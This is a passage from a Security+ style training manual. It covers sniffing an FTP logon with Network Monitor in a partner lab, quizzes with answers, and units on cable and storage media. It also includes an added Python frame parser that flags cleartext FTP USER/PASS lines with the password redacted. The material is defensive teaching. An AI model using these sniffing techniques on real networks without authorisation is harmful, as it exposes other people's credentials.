                         NNTP, IMAP, POP, and SNMP. For FTP, Network Monitor can capture the entire FTP
                         session and present the username and password to the potential hacker. One way to
                         prevent this is to use only anonymous access for FTP sites; this, however, does not enable
                         you to lock down access to the server. You could also configure the FTP server to allow
                         only certain IP addresses, or use a VPN connection to limit access to the appropriate
                         users. A sniffer can also be dangerous because it is very difficult to detect and can be
                         attached to almost any part of a network.




                         Exhibit 9-9: Network Monitor capture of an FTP session
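The capture-and-filter behaviour described for Network Monitor above, and the cleartext FTP logon it exposes, as an added example written for these notes (it is not Microsoft's code and not part of the original course): a Python script that decodes constructed Ethernet/IPv4/TCP frames into the fields a sniffer displays (source and destination addresses, protocol, data), applies a capture filter, and scans the filtered FTP traffic for USER and PASS commands so an administrator can confirm where cleartext credentials are still crossing the network. The MAC and IP addresses, ports, user name and payload bytes are constructed sample input, and the password is redacted in the report.

```python
import struct
from dataclasses import dataclass

# Well-known ports of the protocols the text lists as sending passwords in
# clear text (standard IANA assignments).
CLEARTEXT_PORTS = {21: "FTP", 23: "Telnet", 80: "HTTP", 119: "NNTP",
                   110: "POP3", 143: "IMAP", 161: "SNMP"}


@dataclass
class Packet:
    """The fields a sniffer such as Network Monitor shows for one frame."""
    src_mac: str
    dst_mac: str
    src_ip: str
    dst_ip: str
    protocol: str
    src_port: int
    dst_port: int
    payload: bytes


def _ip_bytes(addr):
    return bytes(int(octet) for octet in addr.split("."))


def build_frame(src_ip, dst_ip, src_port, dst_port, payload):
    """Construct a minimal Ethernet/IPv4/TCP frame (sample input, not a real
    capture). Checksums are left zero because nothing here validates them."""
    ethernet = bytes.fromhex("0011223344bb") + bytes.fromhex("0011223344aa") + b"\x08\x00"
    ipv4 = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, 6, 0,
                       _ip_bytes(src_ip), _ip_bytes(dst_ip))
    tcp = struct.pack("!HHIIBBHHH", src_port, dst_port, 0, 0, 0x50, 0x18, 8192, 0, 0)
    return ethernet + ipv4 + tcp + payload


def parse_frame(frame):
    """Decode one frame into the fields displayed in a capture."""
    dst_mac, src_mac = frame[0:6].hex(":"), frame[6:12].hex(":")
    if struct.unpack("!H", frame[12:14])[0] != 0x0800:
        raise ValueError("only IPv4 frames are decoded in this example")
    ip = frame[14:]
    header_len = (ip[0] & 0x0F) * 4
    if ip[9] != 6:
        raise ValueError("only TCP is decoded in this example")
    src_ip = ".".join(str(b) for b in ip[12:16])
    dst_ip = ".".join(str(b) for b in ip[16:20])
    tcp = ip[header_len:]
    src_port, dst_port = struct.unpack("!HH", tcp[0:4])
    data_offset = (tcp[12] >> 4) * 4
    return Packet(src_mac, dst_mac, src_ip, dst_ip, "TCP",
                  src_port, dst_port, tcp[data_offset:])


def capture(frames, keep=lambda p: True):
    """Decode every frame; `keep` plays the role of a Network Monitor capture filter."""
    return [p for p in map(parse_frame, frames) if keep(p)]


def cleartext_protocol(packet):
    """Name the cleartext protocol a packet belongs to, or None."""
    return CLEARTEXT_PORTS.get(packet.dst_port) or CLEARTEXT_PORTS.get(packet.src_port)


def find_ftp_logins(packets):
    """Report FTP USER/PASS commands seen client-to-server. The password itself
    is never written out, only the fact that one crossed the wire in the clear."""
    findings = []
    for p in packets:
        if p.dst_port != 21:
            continue
        line = p.payload.decode("ascii", "replace").strip()
        if line.upper().startswith("USER "):
            findings.append((p.src_ip, p.dst_ip, "USER", line[5:]))
        elif line.upper().startswith("PASS "):
            findings.append((p.src_ip, p.dst_ip, "PASS", "<redacted>"))
    return findings


# Constructed sample capture: an FTP logon, a TLS record (opaque bytes) and a Telnet line.
SAMPLE_FRAMES = [
    build_frame("10.0.0.5", "10.0.0.6", 40001, 21, b"USER Administrator\r\n"),
    build_frame("10.0.0.6", "10.0.0.5", 21, 40001, b"331 Password required\r\n"),
    build_frame("10.0.0.5", "10.0.0.6", 40001, 21, b"PASS password\r\n"),
    build_frame("10.0.0.5", "10.0.0.7", 40002, 443, b"\x16\x03\x01\x00\x05\x01\x00\x00\x01\x00"),
    build_frame("10.0.0.5", "10.0.0.8", 40003, 23, b"admin\r\n"),
]

if __name__ == "__main__":
    ftp_only = capture(SAMPLE_FRAMES, keep=lambda p: 21 in (p.src_port, p.dst_port))
    for p in ftp_only:
        print(p.src_ip, "->", p.dst_ip, p.protocol, p.payload)
    print(find_ftp_logins(ftp_only))
```

The filter passed to `capture` narrows the decoded traffic to port 21 in the same way a Network Monitor filter narrows what is collected; the TLS frame is decoded to its addresses and ports but its payload stays opaque, which is the "encrypted data is not displayed in plain text" behaviour the text describes.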

Do it!                          G-2: Using Network Monitor to sniff an FTP session
                                 Here’s how                              Here’s why

Instructor note                  Students should run this activity with a partner. Both servers should have the FTP
                                 server service and Network Monitor installed.

                                 1 Access Computer Management            Pair up with a partner for this activity. Each of
                                                                         your servers should have FTP services and
                                                                         Network Monitor installed.

                                 2 Expand Services and
                                   Applications

                                 3 Expand Internet
                                   Information Services

                                 4 Expand FTP Sites

                                 5 Ensure that the Default FTP Site      Start the Default FTP Site if it's stopped.
                                   is started

                                 6 Click Start

                                   Choose Administrative
                                   Tools, Network Monitor

                                 7 On the menu bar, choose
                                   Capture, Start

                                 8 Open a Command window

                                 9 Type ftp <your partner’s IP           You might also use the IP address of your own
                                   address>                              server.

                                10 Enter Administrator for the
                                   user

                                   Enter password for the password

                                11 Once you are logged on, enter
                                   quit

                                12 Switch back to the Network Monitor

                                   Choose Capture, Stop

                                   Click View


                                                                         Information displayed will be similar to that
                                                                         shown in Exhibit 9-9.

                                13 Close all windows                    Do not save the capture.

Do it!              G-3:      Reviewing Network Monitor
                      Questions and answers
                       1 Network Monitor captures and displays which of the following? (Choose all that
                         apply.)
                          A    Source address
                          B    Destination address
                          C    Protocol
                          D    Data
                          E    All of the above

                       2 Which of the following security features is available for the full version of
                         Network Monitor?
                          A    Identify Network Monitor Users
                          B    Intrusion detection system add-on
                          C    Packet modification tools
                          D    Password Sniffing tools

                       3 Network Monitor will allow you to view encrypted data in plain text. True or
                         false?

                          False: Encrypted data is unreadable.

                       4 Which of the following protocols sends passwords and data in clear text? (Choose
                         all that apply.)
                          A    Telnet
                          B    FTP
                          C    HTTP
                          D    NNTP
                          E    IMAP
                          F    POP
                          G    SNMP
                          H    All of the above

                       5 Network Monitor will capture all data sent to your NIC by default. What can be
                         used to narrow the scope of the data collected?
                          A    A NIC in promiscuous mode
                          B    A screen
                          C    A filter
                          D    A strainer

6 Network Monitor is considered a sniffer. Which of the following is a
  characteristic of a sniffer?
  A      Logging
  B      Fault analysis
  C      Performance analysis
  D      All of the above

7 A sniffer can be dangerous because it is very difficult to detect and can be
  attached to almost any part of a network. True or false?

  True


Unit summary: Network devices
Topic A              In this topic, you learned that a firewall creates a virtual barrier between an internal and
                     external network. It accomplishes this through network address translation, packet
                     filtering, stateful packet inspection, application gateways, and access control lists.
                     You also learned that the steps involved in drafting a security policy include
                     determining what devices require protection, identifying the potential threats, disabling
                     non-essential services, and identifying who requires access to the network and who will
                     administer it.
Topic B              In this topic, you learned how routers and gateways are used within the networking
                     environment and how to safeguard their security. You learned about the various servers
                     found in the demilitarized zone, including bastion hosts, honey pots, and application
                     gateways. You also examined the Open Systems Interconnection (OSI) stack and
                     how it applies to packet filtering on the router.
Topic C              In this topic, you learned the steps to take to secure a switch. You identified the
                     vulnerabilities intrinsic in switches and how they can be overcome using virtual local
                     area networks (VLANs), Secure Shell (SSH), and installation behind a firewall.
Topic D              In this topic, you learned how to protect Private Branch Exchange (PBX), modems,
                     and wireless devices against intrusion. You learned that these are often overlooked
                     when developing a security policy and require special diligence to overcome their
                     vulnerabilities.
Topic E              In this topic, you learned how to secure remote access connections using Virtual
                     Private Networks (VPNs) and Remote Access Service (RAS) technologies.
Topic F              In this topic, you studied the Intrusion Detection System (IDS). You learned that the
                     IDS offers the ability to analyze data in real time to detect, log, and stop misuse or
                     attacks as they occur. You also learned about the various types of Intrusion Detection
                     Systems.
Topic G              In this topic, you learned about the characteristics of network sniffers and how to use
                     Microsoft Network Monitor to monitor traffic on the network.

                     Review questions
                       1 What is a firewall?
                         A hardware or software barrier that isolates one network from another.

                       2 Answering the following questions provides you with what? What is being
                         protected, from whom is it being protected, what services does the company need to
                         access over the network, who gets access to which resources, and who administers
                         the network?
                         By answering those questions, you can draft a robust security policy.

                       3 What do firewalls protect against?
                         Firewalls effectively protect against malicious packets from the outside and unauthorized Internet
                         access from within the company.

                       4 List the techniques typically used by firewalls to protect networks.
                         NAT, packet filtering, SPI, and ACL

 5 PAT is a subset of NAT. True or False?
   True

 6 What is a router?
   A network management device that sits between different network segments and routes traffic
   from one network to another.

 7 A DMZ is used for servers on a battlefield. True or False?
   False: DMZ in network terms is the area that a company sets aside for servers that are publicly
   accessible or have lower security requirements than other internal servers.

 8 What is a bastion host?
   A computer that resides in a DMZ and hosts Web, mail, DNS, and/or FTP services.

 9 What is another name for an application gateway?
   Proxy server

10 List the layers of the OSI model.
   1 Physical
   2 Data Link
   3 Network
   4 Transport
   5 Session
   6 Presentation
   7 Application

11 Which devices work at layer 1 of the OSI model?
   A   Bridge
   B   Switch
   C   Repeater
   D   Hub

12 Which Layer 2 device can limit the functionality of sniffing?
   A   A bridge
   B   A hub
   C   A switch
   D   A router

13 Why should you configure a switch using a physical connection to it?
   If you use Telnet or HTTP to access the switch remotely, both of these are clear-text
   protocols that can be intercepted, which compromises the security of the switch
   configuration.

14 What feature is used for cable network security that provides authentication and
   packet filtering?
   DOCSIS

                  15 What steps can you take to make RAS connections more secure?
                      Use a bastion host running only RAS and protected by application gateway software or firewall
                      software. To further enhance security, use the encryption and mandatory callback features
                      offered on RAS. In addition, if any unauthorized persons should gain access to the RAS server,
                      they will still have to break through the firewall to get useful information.

                  16 VPN tunnels typically use IPSec encryption. True or False?
                      True

                  17 Intrusion detection systems (IDS) offer the ability to analyze data in real time to
                     detect, log, and stop misuse or attacks as they occur. True or False?
                      True

                  18 Host-based IDS systems are usually dedicated platforms with two components: a
                     sensor, which passively analyzes network traffic, and a management system, which
                     allows security personnel to configure the sensors and provides alarms or feedback
                     to the administrator. True or False?
                      False: This is a description of a network-based IDS.

                  19 How does anomaly-based detection work?
                      Anomaly-based detection involves building statistical profiles of user activity and then reacting to
                      any activity that falls outside these profiles.


                  Independent practice activity
                  In this exercise, you test your computer for Internet Security. You must have an Internet
                  connection to begin this exercise.
                    1 At your server, go to the Gibson Research Corporation Web site:
                              http://grc.com/default.htm.
                    2 Click on the ShieldsUp! link. You might have to scroll down to see the link.
                    3 On the resulting Shields Up! page, scroll down midway and click on the Proceed
                      button. Click Yes.
                    4 Click on the File Sharing button.
                    5 Your computer system will be tested for file system security. If you have a printer
                      available, print the results of the test noting any system vulnerabilities.
                    6 Scroll down the page and click on the Common Ports button.
                    7 Your computer system will be tested for security related to ports that are commonly
                      used. If you have a printer available, print the results of the test noting any system
                      vulnerabilities.
                    8 Repeat the process of checking your computer by clicking on the All Service Ports,
                      Messenger Spam and Browser Headers buttons respectively after each previous test
                      has completed.
                    9 When you've completed all tests, return to the GRC Web site at
                      http://grc.com/default.htm and again click on the ShieldsUp! link.
                  10 Close all open windows.


Unit 10
Transmission and storage media
                       Unit time: 60 minutes

                       Complete this unit, and you’ll know how to:

                       A Identify the various types of transmission
                          media and describe how to physically
                          protect the media.

                       B Identify the various types of storage media
                          and discuss ways to mitigate the risk of
                          catastrophic data loss.


Topic A: Transmission media
                     This topic covers the following CompTIA Security+ exam objective:

                      #       Objective

                      3.2     Understand the security concerns for the following types of media
                                • Coaxial Cable
                                • UTP / STP (Unshielded Twisted Pair / Shielded Twisted Pair)
                                • Fiber Optic Cable




                     Types of transmission media
Explanation          At the core of internetworking technology is the Open Systems Interconnection (OSI)
                     model. The first layer (Physical layer) of the model deals with the transmission media,
                     which include:
                            • Coaxial cable
                            • Twisted pair copper cable (shielded and unshielded twisted pair)
                            • Fiber-optic cable
                            • Wireless connections

                     Coaxial cable
                     Coaxial cable has a single wire conductor surrounded by an insulating material, which
                     in turn is surrounded by a braided metal shield (see Exhibit 10-1). Coaxial cable tends to
                     be more expensive than traditional telephone wiring, but is much less prone to
                     interference. Vulnerabilities include cable breaks and malicious tapping.
                     There are actually three types of coaxial cable used in networking:
                            • RG-8
                            • RG-58
                            • RG-59




                     Exhibit 10-1: Coaxial cable

RG-8
RG-8, also referred to as 10Base5 or ThickNet, is the oldest form of coaxial cable. It
uses baseband (single channel) signaling and 50-Ohm terminators. It is primarily used
as a backbone in an Ethernet LAN environment and often connects one wiring closet to
another. It can transmit data at speeds up to 10 Mbps, cover distances up to 500 meters,
and can accommodate up to 100 nodes per segment. Up to five segments can be daisy-
chained. Due to its rigidity, it is difficult to work with.

RG-58
RG-58, also called 10Base2 or Thinnet (thin coaxial cable), uses baseband signaling and
50-Ohm terminators. It is the more popular form of coaxial cabling for Ethernet
networks. Thinnet is capable of covering up to 185 meters and is not highly susceptible
to noise interference. It transmits at 10 Mbps and can support up to 30 nodes per
segment. Up to five segments can be daisy-chained.

RG-59
RG-59 is the familiar coax cable used for cable TV and cable modems. It is rated 75
Ohms and offers broadband (multiple channels) transmission. RG-59 is able to transport
both analog and high-speed digital signals, allowing for data, voice, and video
capabilities.
Note: It is important to know that 50-ohm and 75-ohm cabling are not interchangeable.

Twisted pair cable
Twisted pair cable is a popular wiring type for LANs. Individual wires are twisted
together to prevent cross talk between pairs and to reduce the effects of electromagnetic
interference (EMI) and radio frequency interference (RFI). EMI is interference in signal
transmission or reception and is caused by the radiation of electrical or magnetic fields,
which are present near power cables, heavy machinery, or fluorescent lighting. Twisting
the copper wires together and wrapping them in a plastic outer casing can lessen this
type of interference. It is a very inexpensive alternative to coaxial cable, but cannot
support the same distances. Twisted pair copper cable has long been used by telephone
companies, and most buildings in North America are pre-wired with one version of it,
unshielded twisted pair (UTP). An example is shown in Exhibit 10-2.




Exhibit 10-2: Unshielded twisted pair cable

                  The difference between UTP and shielded twisted pair (STP) is an extra foil shield that
                  is wrapped between the copper pairs to provide additional protection from EMI (Exhibit
                  10-3).




                  Exhibit 10-3: Shielded twisted pair cable

                  Twisted pair is further classified into different categories based on the data transmission
                  rates it can sustain. The most common types of cables are Category 3 (CAT 3),
                  Category 5 (CAT 5), and most recently Category 6 (CAT 6).
                      • CAT 3 is the minimum requirement for 10 Mbps Ethernet and voice systems.
                      • CAT 5 is required to support Fast Ethernet (100 Mbps) and uses an 8-pin
                        configuration that can be modified for use as a crossover cable, a straight-
                        through cable, or a customized cable.
                      • CAT 5E is a higher-grade CAT 5 cable.
                      • CAT 6 is a newer technology that is capable of supporting Gigabit Ethernet
                        (1000 Mbps), is backwards compatible, and also uses an 8-pin configuration.
                  Twisted pair connects to hardware using an RJ-45 connector, which looks very
                  similar to a phone jack, but is a bit larger (Exhibit 10-4).




                  Exhibit 10-4: RJ-45 connector

                  Note: It is important to know that twisted pair is very easily spliced, which allows
                  unauthorized users access to the network. A discussion of these types of problems
                  follows later in the unit.

Fiber-optic cable
Fiber-optic cable is the newest form of cable available. It comprises a glass core that is
encased by a plastic outer covering. It is also much smaller, lighter, more fragile, and
susceptible to damage than coaxial cable or twisted pair (Exhibit 10-5).




Exhibit 10-5: Fiber-optic cable

Instead of an electrical current (like coaxial and twisted pair), fiber-optic cable carries
light. It is capable of transmitting more data much further than other wiring types and is
immune to the effects of EMI. Perhaps the biggest benefit of using fiber-optic cable is
that it is nearly impossible to splice without detection. In order to effectively split a
fiber-optic signal, the core must be disrupted, thus allowing for ease of detection by a
network administrator.
The biggest disadvantages to fiber are its cost and its difficulty to install and
manipulate. The table below provides a comparison of the three types of wired
transmission media just discussed.

 Media               Advantages                             Disadvantages

 Coaxial cable       High bandwidth, long distances,        Physical dimensions (can be bulky and
                     relative EMI immunity                  difficult to work with), easily tapped, single
                                                            cable break brings the network down

 Twisted pair        Inexpensive, widely used, easy to      Most sensitive to EMI, supports short
 copper cable        add nodes, single cable break          distances, easily tapped
                     won’t bring the network down

 Fiber-optic cable   Very high bandwidth, EMI               Most expensive, difficult to implement
                     immunity, long distances




Wireless
Unguided transmissions of data use various technologies, including microwave, radio,
and infrared, to receive and transmit over the airwaves. Wireless was previously discussed at
length, yet it is important to realize that it too is a form of transmission media and
should be considered when thinking about implementing and securing networks. Much
like coaxial cable and twisted pair copper cable, unguided transmission methods are
vulnerable to security breaches in which unauthorized users intercept data flows. The
most important distinction is that because unguided connections cannot easily be
physically contained the way wired media can, they are much more difficult to secure.

Do it!              A-1:      Discussing transmission media
                      Questions and answers
                       1 Thinnet can transmit data at speeds up to __________.
                          A    100 Mbps
                          B    50 Mbps
                          C    10 Mbps
                          D    5 Mbps

                       2 A(n) __________ is a standardized connector used to connect twisted pair copper
                         cable to a piece of networking equipment.
                          A    DL-17
                          B    RJ-45
                          C    RJ-54
                          D    RJ-11
                          E    LD-71

                       3 Fiber-optic cable is comprised of a __________ core.
                          A    plastic
                          B    copper
                          C    gold
                          D    glass

                       4 Fiber-optic cable uses __________ to transmit data.
                          A    EMI
                          B    electrical current
                          C    light
                          D    vibrations

                       5 __________ is the most secure of the physical transmission media.
                          A    Coaxial cable
                          B    Twisted pair copper cable
                          C    Fiber-optic cable

                       6 __________ is the most inexpensive transmission media.
                          A    Coaxial cable
                          B    Twisted pair copper cable
                          C    Fiber-optic cable

7 Twisted-pair cable is the most widely known by the general public because it is
  the primary type of cabling used for cable television. True or false?

  False. Coaxial cable is used for cable television.

8 CAT 3 is the minimum requirement for 10 Mbps Ethernet and voice systems.
  True or false?

  True

9 CAT 5 is required to support Fast Ethernet (100 Mbps). True or false?

  True

                     Securing transmission media
Explanation          Many unauthorized users intend to harm an organization by accessing the network
                     infrastructure. Implementing an extremely secure infrastructure to counteract this type
                     of activity can be very expensive, yet cutting corners when securing transmission media
                     can make an organization an easy target. A balanced approach must be followed when
                     making security decisions.
                     The most vulnerable aspect of a network is the data flow. Network infrastructures may
                     be very complex and span significant geographic distances. These interdependent pieces
                     of the network can be easily compromised when a wire or cable is tapped or spliced.
                     Common attacks include interception and interruption of traffic:
                           • Interception of traffic usually involves tampering with physical media as it
                              crosses non-secure areas. For example, coaxial cable or twisted pair is
                              sometimes used to connect separate floors in an office building. The space
                              between floors may not be secured by the company or organization, leaving the
                              cable accessible to potential attackers with nothing more than a simple splice.
                         • Interruption of traffic is caused by rendering network access devices inoperable.
                           This can happen when a potential attacker has access to a wiring closet or LAN
                           closet. Damage to networking equipment is easy to accomplish once access is
                           gained.
                     More difficult attacks involve unauthorized eavesdropping on, or sniffing of, network
                     traffic, because they typically require physical access. If the network has been
                     compromised to the point where this can occur, most of the work needed to attack the
                     integrity of the network has already been done. Common scenarios include:
                         • Inserting a node that has the ability to intercept network traffic using a sniffer or
                           some other packet analyzer.
                         • Modifying switch or router configurations to bypass network security devices
                           such as firewalls.
                         • Resetting an interior node so that its data flows are exported to an external path.
                         • War driving, a common problem with wireless transmissions.
                     Altering data flows on the network compromises the integrity of the network. Potential
                     damage can include the corruption of data, sabotage of core business plans, and
                     impersonation of corporate nodes to gain even further access. This can be accomplished
                     by cracking passwords obtained using a sniffer.

                     Physical security
                     Network devices are usually easy targets because most organizations do not have a
                     permanent person on duty to protect the equipment in its physical location. A locked
                     door on a wiring closet is not enough if that space is shared with phone companies or
                     other external vendors. If the space is shared, enclosed racks that can be locked should
                     be purchased. Only authorized employees who need access to the network equipment
                     are given a key. Another added layer of security in this instance is to install closed
                     circuit security cameras that are monitored as part of the standard security of the
                     building.
                     In a large Web complex or data center, raised floors are a great place for attackers to
                     hide devices that are tapped into the network. There are floor tiles available that you can
                     fasten to the floor to provide another layer of security. It is also a good idea to monitor
                     the floor area with regular inspections looking for unauthorized equipment.

It is extremely difficult to ensure the security of physical cabling. Both coaxial cable
and twisted pair are easily spliced. The most vulnerable places for gaining unauthorized
access to cabling are between buildings or floors. Sometimes, the distance between the
points is large enough to require fiber-optic cable, which gives the added benefit of
more security. However, the majority of interfloor connections still use some form of
copper wire, which makes the physical security of that connection all the more
important.

Electromagnetic emissions
Despite all of the physical security that can be implemented, it is still possible for
attackers to eavesdrop on data flows by listening for electromagnetic emissions from
workstations and other nodes. There are several ways to protect against this. If possible,
purchase and use equipment that is designed to limit or eliminate the signal leaks. This
can be very expensive. Fiber-optic cable is especially good at eliminating this type of
risk.
Another way to stop eavesdropping through electromagnetic emission is to encrypt the
data flows using various different encryption technologies. This way, even if an attacker
has access to the flows, the data is useless without a key to decrypt the data.

Power interruptions
In many situations, LAN and wiring closets tend to share spaces with power sources and
other utilities. This exposes the network to a failure risk even without a threat of an
attacker. Should there be a fire, the network can be showered with water or other fire
retardants. Several dry methods for fire extinguishing can be used and should be
investigated when securing a network.
Many LANs are also completely reliant on a power supplier for all the power to the
network. Deploying an uninterruptible power supply (UPS) can mitigate this risk by
providing temporary power during a brief outage.

Interruption of services
Another way to secure the infrastructure is to implement a redundant network (having
multiple devices in the same function). In this instance, if a network device becomes
compromised, it does not necessarily mean that the entire network is compromised. A
backup device can be available to take over the duties of the disabled piece of
equipment.

War driving
The media has covered many cases of war driving. Literally, war driving is using a
laptop’s wireless network interface card set in promiscuous mode to pick up unsecured
wireless signals. Today, hackers are war driving, or LAN-jacking, wireless networks for
anonymous and free high-speed Internet access or purely for access to a network.
War driving requires no elaborate software or hardware. An ordinary wireless NIC set
in promiscuous mode easily latches on to open wireless network beacons. Using a
global positioning satellite (GPS) receiver in conjunction with wireless network
interface cards, hackers are mapping major metropolitan areas and compiling a list of
wireless networks, both secured and unsecured. One of the best ways to defend against
such attacks is to use a VPN or other encryption technology when using wireless LANs.

                    Thorough attention to the security of the infrastructure is one of the least expensive
                    means of preventing successful compromises of the system. While stronger security
                    appliances and extensive infrastructure choices help make more secure networks,
                    careful design and implementation is necessary. Mapping out cabling and deploying
                    fiber optics in unsecured areas can help mitigate the risk of eavesdropping.

Do it!              A-2:     Securing transmission media
                     Questions and answers
                      1 A(n) __________ can mitigate the risk of power outages and network downtime.
                         A    surge protector
                         B    UPS
                         C    EMI
                         D    ACL

                      2 What is the most likely area for an intruder to try to gain access to physical
                        network media?

                         A non-secure area, such as the space between floors where coaxial or twisted pair media
                         may be connecting separate floors in an office building.

                      3 What are some of the ways you can minimize eavesdropping of electromagnetic
                        emissions?

                         Use fiber optic cable and/or encrypt data.

                      4 What is another term for war driving?

                         LAN-jacking


Topic B: Storage media
              This topic covers the following CompTIA Security+ exam objective:

               #     Objective

               3.2   Understand the security concerns for the following types of media
                      • Removable media
                          • Tape
                          • CD-R (Recordable Compact Disks)
                          • Hard Drives
                          • Diskettes
                          • Flashcards
                          • Smartcards




              Fixed and removable storage media
Explanation   Computer users are constantly creating and transporting files that need to be stored and
              used later. Storage media provides a way to hold data at rest.
              Perhaps the most common type of storage media is a hard disk drive. Every computer
              has a permanent hard drive as part of its hardware configuration. The hard drive can
              store a multitude of information, from operating systems to software to personal files.
              Hard disk drives were developed by IBM in the 1970s and are ubiquitous today.
              Removable storage media has been around nearly as long as the computer itself and
              goes back to the times of the punch card. Advancements in computer technology
              brought about magnetic storage devices that are much more efficient and can store
              much larger amounts of data. Today there are three major types of storage media:
              magnetic, optical, and solid-state.

                    Magnetic storage media
                    Magnetic storage media is coated with some form of iron oxide. When data is recorded
                    to the media, an electromagnet inside the disk drive rearranges the iron oxide particles
                    into a series of patterns that represent 0s and 1s. These patterns can be readily identified
                    later. When the data is retrieved, the reading disk drive uses a magnetic field to read
                    what the pattern is. This pattern is then translated into data that is sent to the computer in
                    binary form. The most prominent forms of magnetic storage media in use today are
                    shown in Exhibit 10-6.




                    Exhibit 10-6: Various storage media


                    Floppy disks
                    The first floppy disks were not rigid or encased in hard plastic as they are today. The
                    size of the floppy has changed several times—the original floppy disk measured 8
                    inches across. A 5.25-inch disk was then developed, and finally the 3.5-inch disk that is
                    now commonly used. Other types of floppy disks also exist, but the most common is the
                    3.5-inch, high density, which holds about 1.44 MB of data.
                     The 3.5-inch floppy disk has a circular magnetic piece of plastic, which is placed inside
                     a rigid plastic case for protection. To help avoid data loss, carry disks in a waterproof
                     case, which keeps water and dust from damaging the disk. Keep floppy disks away from
                     anything that might hold a magnetic or electrical field, such as a mobile phone, a radio,
                     metal tools, or paper clips that have been stored in a magnetic paper clip holder. Because
                     floppy disks are made of magnetic material, any other magnetic material can erase or
                     damage data on the floppy disk. Store floppy disks in an area with a temperature
                     between 32° and 140° F. Although the floppy disk was once the primary type of
                     magnetic removable media, it is quickly being replaced by larger-capacity magnetic
                     disks.

                    Cartridge disks
                    Cartridge drives were popular in the 1990s. They gave users more capacity than the 1.44
                    MB floppy disks had. Users were comfortable with removable disk storage—they had
                    been using the floppy disks. Removable disk storage has changed a lot over the years—
                    from the basic floppy disk to the Bernoulli box to the REV drive. Popularity of cartridge
                    drives has declined with the rise in availability of CD and DVD recordable media and
                    drives.

The Iomega Company has created many of the cartridge drives and related media. The
first of these was the Bernoulli Box. It was originally offered with 5, 10, and 20 MB
disk choices. Over the years they increased the disk capacity up to 230 MB. The disks
were Mylar disks (like in a floppy disk), in approximately 5.25 inch sturdy cartridge
cases.

Zip drives
Another popular solution was the Iomega Zip drive. This was slightly larger than a 3.5”
floppy disk. The original capacity was 100 MB. Later versions were 250 and 750 MB.
The 750 MB drive could read 100 MB cartridges, but not write to them. The 250 MB
drive could read and write to 100 MB cartridges, but at a slower speed than to 250 MB
cartridges. It was available with parallel, SCSI, and USB interface options.
Zip disks were prone to getting dirty, and the drives were prone to their heads becoming
misaligned, which caused problems reading the disks. The head arm would be rapidly
snapped into the drive and out again, creating a click. This became known as the “click
of death.” It often tore the edge of the disk and sometimes damaged the head as well.
A damaged disk could in turn damage other drives if it was tried in another drive.




Exhibit 10-7: Zip drive and cartridge


Jaz drives
Another storage solution Iomega introduced was the Jaz drive. It had 1 GB and 2 GB
cartridges that used Winchester hard drive technology. They were available in SCSI and
USB interface models.

REV drives
The current Iomega offering is the 35 GB REV drive. The read/write heads and
controller are contained in the drive. They can be connected via USB, SCSI, FireWire,
and ATAPI interfaces.

                    Imation drives
                    The other major player in the removable cartridge storage solution was Imation, a 3M
                    company. Their product was the SuperDisk. The LS-120 and LS-240 models had 120
                    MB and 240 MB capacity respectively. These drives can also read standard 1.44 MB
                    floppy disks.
                    The drives were not common. They came out after Iomega Zip drives had already been
                    out for several years. They were slow and prone to reliability problems. People liked
                    them because they could read standard floppy disks.

                    Tape drives
                     There are also numerous magnetic tape technologies, such as quarter-inch cartridge,
                     digital audio tape (DAT), and digital linear tape (DLT), that are variations on the
                     tape drive and can store up to 13 GB of information. These types of media are
                     primarily used to back up large amounts of data.

                    Optical storage media
                    Optical storage media uses light and reflection to transmit data. There are different types
                    of optical storage, the most common being the compact disc (CD) as shown in Exhibit
                    10-8.




                    Exhibit 10-8: Compact disc

                    A CD is a plastic disc covered by a layer of aluminum and a layer of acrylic. Data is
                    recorded onto a CD by creating very small bumps in the aluminum layer on long tiny
                    tracks. The data is then read by a laser beam. As the laser hits the bumps in the tracks,
                    an optical reader called an optoelectronic sensor detects the changing pattern of
                    reflected light from the bumps in the aluminum coating. This pattern is then translated
                    into bits and sent to the computer.
                    Although many CDs are produced professionally, it is now possible to make a CD with
                    a personal computer. CD writers, or burners, record the data onto the aluminum coating,
                    creating the bumps that are read by the CD drive. A typical CD can store 700 MB of
                    data, which is approximately the same as 486 standard floppy disks. This means a CD
                    can store over three million pages of text or 20,000 graphic images. CDs are commonly
                    used to store multimedia, such as music or video, which need large amounts of storage
                    space. The most common forms of CDs are those that hold recorded music.

CD-ROMs
The most common type of CD used with computers is the CD-ROM. Material can be
written or recorded to the disc only once, usually by a professional CD-ROM producing
company. CD-ROMs hold prerecorded materials to be used on a computer, such as
software, graphic images, short video clips, or audio. When you purchase a new piece of
software, it normally comes on a CD-ROM and is installed using the CD-ROM drive.

CD-Rs
Compact disc-recordable (CD-R) is another type of CD. It is similar to audio CDs and
CD-ROMs. However, unlike a CD or a CD-ROM, which is purchased prerecorded, a
CD-R is a blank CD. Data is recorded onto the CD-R by using a CD-R drive.
CD-Rs are perfect for storing large amounts of data. Like other types of CDs, CD-Rs
hold about 700 megabytes of data. They can be used to store older documents or files
that you want to save but do not need to access daily. Many people use CD-Rs to
distribute files to others and to backup files.
Although CD-R discs appear to be identical to other types of CDs, instead of having an
aluminum layer on which the data has been prerecorded using bumps, a CD-R has a
layer of light-sensitive dye on top of a layer of reflective gold. Using the CD-R drive,
the data is burned or recorded on the disc with a high-powered laser beam. Instead of
creating bumps in the aluminum layer like a prerecorded CD, the laser changes the color
of the light-sensitive dye by pulsing in patterns.
A CD-R can have data recorded onto it only one time. Hence, it is called a write once,
read many (WORM) type of media. The next step in CD technology is the compact
disc-rewritable (CD-RW). A CD-RW disc is very similar to a CD-R disc, except that it
can be recorded onto more than once. The layer of dye is different and can be rewritten
multiple times, so you can write, delete, and rewrite to the same CD. The CD-RW drive
is similar to the CD-R drive, with the additional ability to record or write over data on
the same disc. Both CD-RW discs and CD-RW drives are more expensive to
purchase than CD-R discs and drives.

DVDs
The DVD is becoming a popular type of permanent optical storage. Primarily used to
store full-length feature films, the DVD is similar to a CD, but with a much larger data
capacity. A DVD holds about seven times as much data as a regular CD. Like CDs,
DVDs are also made out of plastic with a layer of gold, covered by a thin layer of clear
polymer. The difference is that the tracks on a DVD are much thinner and placed closer
to each other, so many more tracks fit on a disc, allowing more space for recorded data.
In addition, DVDs can be recorded on both sides, doubling the amount of storage space
available.

Solid-state storage media
Solid-state is a newer type of removable storage media. This technology usually consists
of a microchip and has no moving parts, which is why it is called solid-state. Data is
recorded directly into the microchip in digital form.

                     There are several popular types of solid-state media currently being used, as shown in
                     Exhibit 10-9. Called “flash memory,” these media are used primarily in digital cameras,
